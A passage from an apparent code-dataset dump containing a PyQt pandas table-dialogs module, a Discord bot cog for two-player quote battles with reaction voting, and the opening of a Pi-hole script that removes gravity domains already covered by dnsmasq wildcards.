pd.read_csv(self.filename, **self.values)\n self.close()\n return\n\n def quit(self):\n self.close()\n return\n\n\nclass BasicDialog(QDialog):\n \"\"\"Qdialog for table operations interfaces\"\"\"\n\n def __init__(self, parent, df, title=None):\n\n super(BasicDialog, self).__init__(parent)\n self.parent = parent\n self.df = df\n self.app = self.parent.app\n self.setWindowTitle(title)\n self.createWidgets()\n self.setGeometry(QtCore.QRect(400, 300, 1000, 600))\n self.show()\n return\n\n def createWidgets(self):\n \"\"\"Create widgets - override this\"\"\"\n\n cols = list(self.df.columns)\n\n def createButtons(self, parent):\n\n bw = self.button_widget = QWidget(parent)\n vbox = QVBoxLayout(bw)\n vbox.setAlignment(QtCore.Qt.AlignTop)\n button = QPushButton(\"Apply\")\n button.clicked.connect(self.apply)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to sub-table\")\n button.clicked.connect(self.copy_to_subtable)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to clipboard\")\n button.clicked.connect(self.copy_to_clipboard)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to new sheet\")\n button.clicked.connect(self.copy_to_sheet)\n vbox.addWidget(button)\n button = QPushButton(\"Export result\")\n button.clicked.connect(self.export)\n vbox.addWidget(button)\n button = QPushButton(\"Close\")\n button.clicked.connect(self.close)\n vbox.addWidget(button)\n return bw\n\n def apply(self):\n \"\"\"Override this\"\"\"\n return\n\n def copy_to_subtable(self):\n \"\"\"Do the operation\"\"\"\n\n df = self.table.model.df\n self.parent.showSubTable(df)\n return\n\n def copy_to_sheet(self):\n \"\"\"Copy result to new sheet in app, if available\"\"\"\n\n if self.app == None:\n return\n name, ok = QInputDialog().getText(self, \"Enter Sheet Name\",\n \"Name:\", QLineEdit.Normal)\n if ok and name:\n self.app.addSheet(name=name, df=self.table.model.df)\n return\n\n def copy_to_clipboard(self):\n \"\"\"Copy result to clipboard\"\"\"\n\n df = self.table.model.df\n df.to_clipboard()\n return\n\n def export(self):\n \"\"\"export result to file\"\"\"\n\n df = self.table.model.df\n options = QFileDialog.Options()\n filename, _ = QFileDialog.getSaveFileName(self, \"Export File\",\n \"\", \"CSV files (*.csv);;\",\n options=options)\n if not filename:\n return\n if not os.path.splitext(filename)[1] == '.csv':\n filename += '.csv'\n df.to_csv(filename)\n return\n\n def close(self):\n self.destroy()\n return\n\n\nclass AggregateDialog(BasicDialog):\n \"\"\"Qdialog with multiple inputs\"\"\"\n\n def __init__(self, parent, df, title='Groupby-Aggregate'):\n\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n funcs = ['sum', 'mean', 'size', 'std', 'min', 'max', 'var']\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.groupbyw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Group by'))\n l.addWidget(w)\n w = self.aggw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Aggregate on'))\n l.addWidget(w)\n w = self.funcw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(funcs)\n l.addWidget(QLabel('Functions'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def customButtons():\n vbox.addWidget(QLabel('map cols to functions'))\n mapcolsbtn = QCheckBox()\n vbox.addWidget(mapcolsbtn)\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n grpcols = [i.text() for i in self.groupbyw.selectedItems()]\n aggcols = [i.text() for i in self.aggw.selectedItems()]\n funcs = [i.text() for i in self.funcw.selectedItems()]\n aggdict = {}\n\n if len(funcs) == 1: funcs = funcs[0]\n for a in aggcols:\n aggdict[a] = funcs\n\n res = self.df.groupby(grpcols).agg(aggdict).reset_index()\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass PivotDialog(BasicDialog):\n \"\"\"Dialog to pivot table\"\"\"\n\n def __init__(self, parent, df, title='Pivot'):\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n funcs = ['sum', 'mean', 'size', 'std', 'min', 'max', 'var']\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.columnsw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Columns'))\n l.addWidget(w)\n w = self.idxw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Index'))\n l.addWidget(w)\n w = self.valuesw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Values'))\n l.addWidget(w)\n w = self.aggw = QListWidget(main)\n w.addItems(funcs)\n l.addWidget(QLabel('Aggregate function'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n cols = [i.text() for i in self.columnsw.selectedItems()]\n vals = [i.text() for i in self.valuesw.selectedItems()]\n idx = [i.text() for i in self.idxw.selectedItems()]\n aggfuncs = [i.text() for i in self.aggw.selectedItems()]\n res = pd.pivot_table(self.df, index=idx, columns=cols, values=vals, aggfunc=aggfuncs)\n names = res.index.names\n res = res.reset_index(col_level=2)\n # print (res)\n if util.check_multiindex(res.columns) == 1:\n res.columns = res.columns.get_level_values(2)\n\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass MeltDialog(BasicDialog):\n \"\"\"Dialog to melt table\"\"\"\n\n def __init__(self, parent, df, title='Melt'):\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n funcs = ['sum', 'mean', 'size', 'std', 'min', 'max', 'var']\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.idvarsw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('ID vars'))\n l.addWidget(w)\n w = self.valuevarsw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Value vars'))\n l.addWidget(w)\n w = self.varnamew = QLineEdit('var')\n l.addWidget(QLabel('Var name'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n idvars = [i.text() for i in self.idvarsw.selectedItems()]\n value_vars = [i.text() for i in self.valuevarsw.selectedItems()]\n varname = self.varnamew.text()\n res = pd.melt(self.df, idvars, value_vars, varname)\n\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass MergeDialog(BasicDialog):\n \"\"\"Dialog to melt table\"\"\"\n\n def __init__(self, parent, df, title='Merge Tables'):\n\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n if hasattr(self.parent, 'subtable') and self.parent.subtable != None:\n self.df2 = self.parent.subtable.table.model.df\n cols2 = self.df2.columns\n else:\n self.df2 = None\n cols2 = []\n cols = list(self.df.columns)\n ops = ['merge', 'concat']\n how = ['inner', 'outer', 'left', 'right']\n hbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n hbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.ops_w = QComboBox(main)\n w.addItems(ops)\n l.addWidget(QLabel('Operation'))\n l.addWidget(w)\n w = self.lefton_w = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Left on'))\n l.addWidget(w)\n w = self.righton_w = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols2)\n l.addWidget(QLabel('Right on'))\n l.addWidget(w)\n\n w = self.leftindex_w = QCheckBox(main)\n w.setChecked(False)\n l.addWidget(QLabel('Use left index'))\n l.addWidget(w)\n w = self.rightindex_w = QCheckBox(main)\n w.setChecked(False)\n l.addWidget(QLabel('Use right index'))\n l.addWidget(w)\n\n w = self.how_w = QComboBox(main)\n w.addItems(how)\n l.addWidget(QLabel('How'))\n l.addWidget(w)\n\n w = self.left_suffw = QLineEdit('_1')\n l.addWidget(QLabel('Left suffix'))\n l.addWidget(w)\n w = self.right_suffw = QLineEdit('_2')\n l.addWidget(QLabel('Right suffix'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n hbox.addWidget(self.table)\n bf = self.createButtons(self)\n hbox.addWidget(bf)\n return\n\n def updateColumns(self):\n\n # self.df2 =\n cols2 = self.df2.columns\n # w = self.righton_w\n # w.clear()\n # w.addItems(cols2)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n left_index = self.leftindex_w.isChecked()\n right_index = self.rightindex_w.isChecked()\n if left_index == True:\n lefton = None\n else:\n lefton = [i.text() for i in self.lefton_w.selectedItems()]\n if right_index == True:\n righton = None\n else:\n righton = [i.text() for i in self.righton_w.selectedItems()]\n how = self.how_w.currentText()\n op = self.ops_w.currentText()\n if op == 'merge':\n res = pd.merge(self.df, self.df2,\n left_on=lefton,\n right_on=righton,\n left_index=left_index,\n right_index=right_index,\n how=how,\n suffixes=(self.left_suffw.text(), self.right_suffw.text())\n )\n else:\n res = pd.concat([self.df, self.df2])\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass ConvertTypesDialog(BasicDialog):\n \"\"\"Dialog to melt table\"\"\"\n\n def __init__(self, parent, df, title='Convert types'):\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createButtons(self, parent):\n bw = self.button_widget = QWidget(parent)\n vbox = QVBoxLayout(bw)\n vbox.setAlignment(QtCore.Qt.AlignTop)\n button = QPushButton(\"Apply\")\n button.clicked.connect(self.apply)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to new sheet\")\n button.clicked.connect(self.copy_to_sheet)\n vbox.addWidget(button)\n button = QPushButton(\"Close\")\n button.clicked.connect(self.close)\n vbox.addWidget(button)\n return bw\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n res = []\n for col in self.df.columns:\n res.append([col, str(self.df[col].dtype), ''])\n cols = ['name', 'type', 'convert']\n info = pd.DataFrame(res, columns=cols)\n\n self.table = core.DataFrameTable(self, info, font=core.FONT)\n types = ['int', 'float', 'categorical']\n\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n idvars = [i.text() for i in self.idvarsw.selectedItems()]\n value_vars = [i.text() for i in self.valuevarsw.selectedItems()]\n varname = self.varnamew.text()\n res = pd.melt(self.df, idvars, value_vars, varname)\n\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass PreferencesDialog(QDialog):\n \"\"\"Preferences dialog from config parser options\"\"\"\n\n def __init__(self, parent, options={}):\n super(PreferencesDialog, self).__init__(parent)\n self.parent = parent\n self.setWindowTitle('Preferences')\n self.resize(700, 200)\n self.setGeometry(QtCore.QRect(300, 300, 600, 200))\n self.setMaximumWidth(600)\n self.setMaximumHeight(300)\n self.createWidgets(options)\n self.show()\n return\n\n def createWidgets(self, options):\n \"\"\"create widgets\"\"\"\n\n import pylab as plt\n colormaps = sorted(m for m in plt.cm.datad if not m.endswith(\"_r\"))\n timeformats = ['%m/%d/%Y', '%d/%m/%Y', '%d/%m/%y',\n '%Y/%m/%d', '%y/%m/%d', '%Y/%d/%m',\n '%d-%b-%Y', '%b-%d-%Y',\n '%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H:%M']\n self.opts = {'rowheight': {'type': 'spinbox', 'default': 18, 'range': (5, 50), 'label': 'row height'},\n 'columnwidth': {'type': 'spinbox', 'range': (10, 300),\n 'default': options['columnwidth'], 'label': 'column width'},\n 'alignment': {'type': 'combobox', 'default': 'w', 'items': ['left', 'right', 'center'],\n 'label': 'text align'},\n 'font': {'type': 'font', 'default': 'Arial', 'default': options['font']},\n 'fontsize': {'type': 'slider', 'default': options['fontsize'], 'range': (5, 40),\n 'interval': 1, 'label': 'font size'},\n 'timeformat': {'type': 'combobox', 'default': options['timeformat'],\n 'items': timeformats, 'label': 'Date/Time format'}\n # 'floatprecision':{'type':'spinbox','default':2, 'label':'precision'},\n }\n sections = {'table': ['alignment', 'rowheight', 'columnwidth'],\n 'formats': ['font', 'fontsize', 'timeformat']}\n\n dialog, self.widgets = dialogFromOptions(self, self.opts, sections)\n\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(dialog)\n dialog.setFocus()\n bw = self.createButtons(self)\n self.layout.addWidget(bw)\n return\n\n def createButtons(self, parent):\n bw = self.button_widget = QWidget(parent)\n vbox = QHBoxLayout(bw)\n button = QPushButton(\"Apply\")\n button.clicked.connect(self.apply)\n vbox.addWidget(button)\n button = QPushButton(\"Close\")\n button.clicked.connect(self.close)\n vbox.addWidget(button)\n return bw\n\n def apply(self):\n \"\"\"Apply options to current table\"\"\"\n\n kwds = getWidgetValues(self.widgets)\n from . import core\n core.FONT = kwds['font']\n core.FONTSIZE = kwds['fontsize']\n core.COLUMNWIDTH = kwds['columnwidth']\n core.TIMEFORMAT = kwds['timeformat']\n self.parent.refresh()\n return\n\n\nclass FilterDialog(QWidget):\n \"\"\"Qdialog for table query/filtering\"\"\"\n\n def __init__(self, parent, table, title=None):\n\n super(FilterDialog, self).__init__(parent)\n self.parent = parent\n # self.app = self.parent.app\n self.table = table\n self.setWindowTitle(title)\n self.resize(400, 200)\n self.createWidgets()\n self.filters = []\n # self.setMinimumHeight(200)\n # self.show()\n return\n\n def createToolBar(self, parent):\n\n items = {'Apply': {'action': self.apply, 'file': 'filter'},\n 'Add': {'action': self.addFilter, 'file': 'add'},\n 'Refresh': {'action': self.refresh, 'file': 'table-refresh'},\n 'Subtract': {'action': self.removeFiltered, 'file': 'table-remove'}\n }\n toolbar = QToolBar(\"Toolbar\")\n toolbar.setOrientation(QtCore.Qt.Horizontal)\n addToolBarItems(toolbar, self, items)\n # vbox.addWidget(toolbar)\n return toolbar\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n df = self.table.model.df\n cols = list(df.columns)\n self.layout = QVBoxLayout(self)\n self.setLayout(self.layout)\n self.query_w = QLineEdit()\n self.layout.addWidget(QLabel('String filter'))\n self.layout.addWidget(self.query_w)\n self.query_w.returnPressed.connect(self.apply)\n w = self.column_w = QListWidget()\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n # w.setFixedHeight(60)\n w.addItems(cols)\n self.layout.addWidget(QLabel('Filter Columns'))\n self.layout.addWidget(self.column_w)\n tb = self.createToolBar(self)\n self.layout.addWidget(tb)\n self.adjustSize()\n return\n\n def refresh(self):\n \"\"\"Reset the table\"\"\"\n\n table = self.table\n if table.filtered == True and hasattr(table, 'dataframe'):\n table.model.df = table.dataframe\n table.filtered = False\n table.refresh()\n return\n\n def update(self):\n \"\"\"Update the column widgets if table has changed\"\"\"\n\n df = self.table.model.df\n cols = list(df.columns)\n self.column_w.clear()\n self.column_w.addItems(cols)\n return\n\n def addFilter(self):\n \"\"\"Add a filter using widgets\"\"\"\n\n df = self.table.model.df\n fb = FilterBar(self, self.table)\n self.layout.insertWidget(4, fb)\n self.filters.append(fb)\n return\n\n def apply(self):\n \"\"\"Apply filters\"\"\"\n\n table = self.table\n if table.filtered == True and hasattr(table, 'dataframe'):\n table.model.df = table.dataframe\n df = table.model.df\n mask = None\n\n s = self.query_w.text()\n cols = [i.text() for i in self.column_w.selectedItems()]\n if len(cols) > 0:\n df = df[cols]\n if s != '':\n try:\n mask = df.eval(s)\n except:\n mask = df.eval(s, engine='python')\n\n # add widget based filters\n if len(self.filters) > 0:\n mask = self.applyWidgetFilters(df, mask)\n # apply mask\n if mask is not None:\n df = df[mask]\n self.filtdf = df\n table.dataframe = table.model.df.copy()\n table.filtered = True\n table.model.df = df\n table.model.layoutChanged.emit()\n table.refresh()\n\n return\n\n def applyWidgetFilters(self, df, mask=None):\n \"\"\"Apply the widget based filters, returns a boolean mask\"\"\"\n\n if mask is None:\n mask = df.index == df.index\n\n for f in self.filters:\n col, val, op, b = f.getFilter()\n try:\n val = float(val)\n except:\n pass\n print(col, val, op, b)\n if op == 'contains':\n m = df[col].str.contains(str(val))\n elif op == 'equals':\n m = df[col] == val\n elif op == 'not equals':\n m = df[col] != val\n elif op == '>':\n m = df[col] > val\n elif op == '<':\n m = df[col] < val\n elif op == 'is empty':\n m = df[col].isnull()\n elif op == 'not empty':\n m = ~df[col].isnull()\n elif op == 'excludes':\n m = -df[col].str.contains(val)\n elif op == 'starts with':\n m = df[col].str.startswith(val)\n elif op == 'has length':\n m = df[col].str.len() > val\n elif op == 'is number':\n m = df[col].astype('object').str.isnumeric()\n elif op == 'is lowercase':\n m = df[col].astype('object').str.islower()\n elif op == 'is uppercase':\n m = df[col].astype('object').str.isupper()\n else:\n continue\n if b == 'AND':\n mask = mask & m\n elif b == 'OR':\n mask = mask | m\n elif b == 'NOT':\n mask = mask ^ m\n return mask\n\n def removeFiltered(self):\n \"\"\"Subtract current filtered result from original table\"\"\"\n\n reply = QMessageBox.question(self, 'Perform Action?',\n 'This will overwrite the current table. Are you sure?',\n QMessageBox.Yes, QMessageBox.No)\n if reply == QMessageBox.No:\n return\n table = self.table\n if table.filtered == False:\n return\n idx = list(self.filtdf.index)\n df = table.dataframe\n table.dataframe = None\n table.filtered = False\n table.model.df = df.loc[~df.index.isin(idx)]\n table.model.layoutChanged.emit()\n table.refresh()\n return\n\n def onClose(self):\n\n self.table.showAll()\n self.close()\n\n\nclass FilterBar(QWidget):\n \"\"\"Single Widget based filter\"\"\"\n\n def __init__(self, parent, table):\n super(FilterBar, self).__init__(parent)\n self.parent = parent\n # self.app = self.parent.app\n self.table = table\n self.createWidgets()\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n operators = ['contains', 'excludes', 'equals', 'not equals', '>', '<', 'is empty', 'not empty',\n 'starts with', 'ends with', 'has length', 'is number', 'is lowercase', 'is uppercase']\n booleanops = ['AND', 'OR', 'NOT']\n df = self.table.model.df\n cols = list(df.columns)\n l = self.layout = QHBoxLayout(self)\n self.setLayout(self.layout)\n w = self.boolean_w = QComboBox()\n w.addItems(booleanops)\n l.addWidget(self.boolean_w)\n w = self.column_w = QComboBox()\n w.addItems(cols)\n # l.addWidget(QLabel('Column:'))\n l.addWidget(self.column_w)\n w = self.operator_w = QComboBox()\n w.addItems(operators)\n l.addWidget(self.operator_w)\n\n self.term_w = QLineEdit()\n l.addWidget(self.term_w)\n icon = QIcon(os.path.join(iconpath, 'remove.png'))\n btn = QPushButton()\n btn.setIcon(icon)\n btn.setMaximumWidth(30)\n btn.clicked.connect(self.onClose)\n l.addWidget(btn)\n return\n\n def getFilter(self):\n \"\"\"Get filter values for this instance\"\"\"\n\n col = self.column_w.currentText()\n val = self.term_w.text()\n op = self.operator_w.currentText()\n booleanop = self.boolean_w.currentText()\n return col, val, op, booleanop\n\n def onClose(self, ce):\n self.parent.filters.remove(self)\n self.close()\n","repo_name":"frynet/AnalyticApp","sub_path":"tablexplore/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":41059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33520599330","text":"import asyncio\nimport random\n\nimport discord\nfrom discord.ext import commands\n\nimport discord_utils as du\nfrom template_cog import LotrCog\n\n\nclass QuoteBattle(LotrCog):\n \"\"\"\n manages a quote-battle between two users\n \"\"\"\n\n def __init__(self, bot):\n super().__init__(bot)\n\n @du.category_check('battles')\n @du.channel_busy_check()\n @commands.guild_only()\n @commands.command(name='quotebattle', aliases=['qbattle', 'qb', 'quote-battle', 'quotefight', 'qfight', 'qf'])\n async def quote_battle_handler(self, ctx):\n \"\"\"\n starts a quote battle with subsequent voting\n \"\"\"\n server = ctx.guild\n # perms_changed = []\n\n result, players = await du.handle_ready_check(self.bot, ctx, player_count=2)\n\n if not result:\n return\n\n # for player in players:\n # self.bot.blocked.append(player.id)\n # if not ctx.channel.permissions_for(player).send_messages:\n # perms_changed.append(player)\n # await ctx.channel.set_permissions(player, send_messages=True, reason='Quote battle')\n\n def quote_check(chk_msg):\n return chk_msg.channel == ctx.channel and chk_msg.author in players\n\n self.bot.busy_channels.append(ctx.channel.id)\n orig_rounds = self.bot.config['discord']['quote_battle']['rounds'] * 2\n rounds_left = orig_rounds - 1\n random.shuffle(players)\n act_player = players[0]\n first_round = True\n await ctx.send(\n f'Welcome to the epic quote battle between {players[0].mention} and {players[1].mention}!\\n{act_player.display_name} starts! Prepare for battle!')\n\n while rounds_left > 0:\n try:\n msg = await self.bot.wait_for('message', check=quote_check,\n timeout=self.bot.config['discord']['quote_battle']['timeout'] // 2)\n except asyncio.TimeoutError:\n msg = await ctx.send('Careful both of you, half of your time to respond has passed!', delete_after=30)\n try:\n await self.bot.wait_for('message', check=quote_check,\n timeout=self.bot.config['discord']['quote_battle']['timeout'] // 2)\n except asyncio.TimeoutError:\n await ctx.send('You did not answer in time. The battle ended.')\n break\n\n if first_round:\n if msg.author.id == act_player.id:\n first_round = False\n else:\n await ctx.send(f'Hey, wait for {act_player.display_name} to start the battle!', delete_after=10)\n await msg.delete()\n continue\n\n if msg.author.id != act_player.id:\n rounds_left -= 1\n act_player = msg.author\n if rounds_left == orig_rounds // 2:\n await ctx.send(f'Half-time! {rounds_left} rounds to go!')\n\n # for player in players:\n # self.bot.blocked.remove(player.id)\n # if player in perms_changed:\n # await ctx.set_permissions(player, send_messages=False, reason='Quote battle')\n if ctx.channel.id in self.bot.busy_channels:\n self.bot.busy_channels.remove(ctx.channel.id)\n\n msg_text = 'The quote battle between {} and {} ended.\\n{} :one: for {} and :two: for {}'\n if server.id in self.bot.config['discord']['quote_battle']['voting_roles']:\n score_msg = await ctx.send(msg_text.format(players[0].display_name, players[1].display_name,\n f\"Hey <@&{self.bot.config['discord']['quote_battle']['voting_roles'][server.id]}>, vote\",\n players[0].mention, players[1].mention))\n else:\n score_msg = await ctx.send(\n msg_text.format(players[0].display_name, players[1].display_name, 'Vote', players[0].mention,\n players[1].mention))\n\n await score_msg.add_reaction('1️⃣') # number 1\n await score_msg.add_reaction('2️⃣') # number 2\n await asyncio.sleep(self.bot.config['discord']['quote_battle']['voting_time'])\n\n try:\n # re-fetch message\n score_msg = await ctx.fetch_message(score_msg.id)\n await score_msg.add_reaction('🛑') # stop-sign\n\n # remove bot reactions, and remove self-votes\n await score_msg.remove_reaction('1️⃣', server.me)\n try:\n await score_msg.remove_reaction('1️⃣', players[0])\n except discord.errors.NotFound:\n pass\n\n await score_msg.remove_reaction('2️⃣', server.me)\n try:\n await score_msg.remove_reaction('2️⃣', players[1])\n except discord.errors.NotFound:\n pass\n\n # re-fetch message again\n score_msg = await ctx.fetch_message(score_msg.id)\n\n voting = [0, 0]\n for item in score_msg.reactions:\n if item.emoji == '1️⃣':\n voting[0] = item.count\n elif item.emoji == '2️⃣':\n voting[1] = item.count\n\n ret_str = f'The vote for the battle between {players[0].mention} and {players[1].mention} concluded.\\n'\n if voting[0] == voting[1]:\n await ctx.send(ret_str + 'Draw! Congratulations, both of you did well!')\n else:\n winner = voting[0] < voting[1]\n await ctx.send(ret_str + f'{players[winner].mention} wins the quote battle! What a fight!')\n\n except discord.errors.HTTPException:\n await ctx.send(self.bot.config['discord']['indicators'][\n 0] + ' An error occurred while counting the votes. Sorry for that. You can probably figure out who won yourself ;)')\n\n\nasync def setup(bot):\n await bot.add_cog(QuoteBattle(bot))\n","repo_name":"heggland/LotR-TriviaBot","sub_path":"cogs/quotebattle.py","file_name":"quotebattle.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"1209325390","text":"#!/usr/bin/env python\n\nimport os\nimport sqlite3\nimport re\nimport subprocess\nimport tempfile\nimport locale\n\n\ndef split_list(in_list, size):\n # Set action on parameters missing\n if not in_list:\n return\n if not size:\n size = 1000\n\n # Yield each sub-list\n for i in range(0, len(in_list), size):\n yield in_list[i:i + size]\n\n\n# Set locale automatically\nlocale.setlocale(locale.LC_ALL, '')\n\npath_pihole = r'/etc/pihole'\npath_dnsmasq = r'/etc/dnsmasq.d'\npath_legacy_regex = os.path.join(path_pihole, 'regex.list')\npath_legacy_gravity = os.path.join(path_pihole, 'gravity.list')\npath_pihole_db = os.path.join(path_pihole, 'gravity.db')\n\nset_gravity_domains = set()\nset_wildcard_domains = set()\nset_regexps = set()\nlist_removal_chunks = list()\nset_regexp_domain_matches = set()\nset_removal_domains = set()\ncount_db_gravity = None\n\ndb_exists = False\nc = None\nconn = None\n\n# Exit if not running as root\nif not os.getuid() == 0:\n print('Please run this script as root')\n exit(1)\nelse:\n print('[i] Root user detected')\n\n# Exit if Pi-hole dir does not exist\nif not os.path.exists(path_pihole):\n print(f'{path_pihole} was not found')\n exit(1)\nelse:\n print('[i] Pi-hole path exists')\n\nprint('[i] Updating gravity (this may take a little time)')\nsubprocess.call(['pihole', '-g'], stdout=subprocess.DEVNULL)\n\n# Determine whether we are using DB or not\nif os.path.isfile(path_pihole_db) and os.path.getsize(path_pihole_db) > 0:\n db_exists = True\n print('[i] DB detected')\nelse:\n print('[i] Legacy lists detected')\n\n# Fetch gravity domains\nprint('[i] Fetching domains')\n\nif db_exists:\n # Create a DB connection\n print(f'[i] Connecting to {path_pihole_db}')\n\n # Create a connection object\n try:\n conn = sqlite3.connect(path_pihole_db)\n except sqlite3.Error as e:\n print(e)\n exit(1)\n\n # Tell the text factory to ignore UTF-8 errors as\n # gravity doesn't yet accommodate for these pesky domains\n conn.text_factory = lambda b: b.decode(errors='ignore')\n # Create a cursor object\n c = conn.cursor()\n\n # Run query to fetch domains\n print('[i] Querying DB for gravity domains')\n c.execute('SELECT domain FROM gravity')\n set_gravity_domains.update(x[0] for x in c.fetchall())\nelse:\n # If gravity.list exists and isn't 0 bytes\n if os.path.exists(path_legacy_gravity) and os.path.getsize(path_legacy_gravity) > 0:\n # Read to set\n # Excluding non utf-8 characters that may have been introduced by list maintainers\n with open(path_legacy_gravity, 'r', encoding='utf-8', errors='ignore') as fOpen:\n set_gravity_domains.update(x for x in map(str.strip, fOpen) if x and x[:1] != '#')\n\n# If gravity domains were returned\nif set_gravity_domains:\n print(f'[i] --> {len(set_gravity_domains):n} domains found')\nelse:\n print('[i] No domains were found')\n exit(1)\n\n# If dnsmasq dir exists, extract wildcards\nif os.path.isdir(path_dnsmasq):\n print(f'[i] Scanning {path_dnsmasq} for wildcards')\n # Set the wildcard regexp\n regexp_wildcard = r'^address=\\/.+\\/(([0-9]{1,3}\\.){3}[0-9]{1,3}|::|#)?$'\n # For each file in dnsmasq dir\n for file in os.listdir(path_dnsmasq):\n # If it's a conf file and not the pi-hole conf\n if file.endswith('.conf') and file != '01-pihole.conf':\n # Create a subprocess command to run grep on the current file\n cmd = subprocess.Popen(['grep', '-E', regexp_wildcard, os.path.join(path_dnsmasq, file)],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8')\n # Run the command\n grep_result = [x.split('/')[1] for x in cmd.communicate()[0].split('\\n') if x]\n # Fetch the return code\n grep_return_code = cmd.returncode\n\n # If there were matches\n if grep_return_code == 0:\n # Add the wildcard domain to the wildcards set\n set_wildcard_domains.update(grep_result)\n\n # If wildcards are found\n if set_wildcard_domains:\n print(f'[i] --> {len(set_wildcard_domains):n} wildcards found')\n print(f'[i] Identifying wildcard conflicts with gravity')\n\n # Remove exact wildcard matches from gravity domains\n set_gravity_domains.difference_update(set_wildcard_domains)\n # Add exact wildcard matches to removal set\n set_removal_domains.update(set_wildcard_domains)\n\n # Initialise a temp file for marked gravity domains\n with tempfile.NamedTemporaryFile('w+') as temp_marked_gravity:\n # Initialise a temp file for marked wildcard domains\n with tempfile.NamedTemporaryFile('w+') as temp_marked_wildcard:\n # Write marked gravity domains\n for line in (f'^{x}$' for x in set_gravity_domains):\n temp_marked_gravity.write(f'{line}\\n')\n # Write marked wildcard domains\n for line in (f'.{x}$' for x in set_wildcard_domains):\n temp_marked_wildcard.write(f'{line}\\n')\n\n # Seek to start of files\n temp_marked_gravity.seek(0)\n temp_marked_wildcard.seek(0)\n\n # Create a subprocess command to run a fixed-string grep search\n # for wildcards against the domains\n cmd = subprocess.Popen(['grep', '-Ff', temp_marked_wildcard.name, temp_marked_gravity.name],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8')\n\n # Run the command\n grep_result = [x[1:-1] for x in cmd.communicate()[0].split('\\n') if x]\n # Fetch the return code\n grep_return_code = cmd.returncode\n\n # If there were matches\n if grep_return_code == 0:\n # Add to removal domains\n 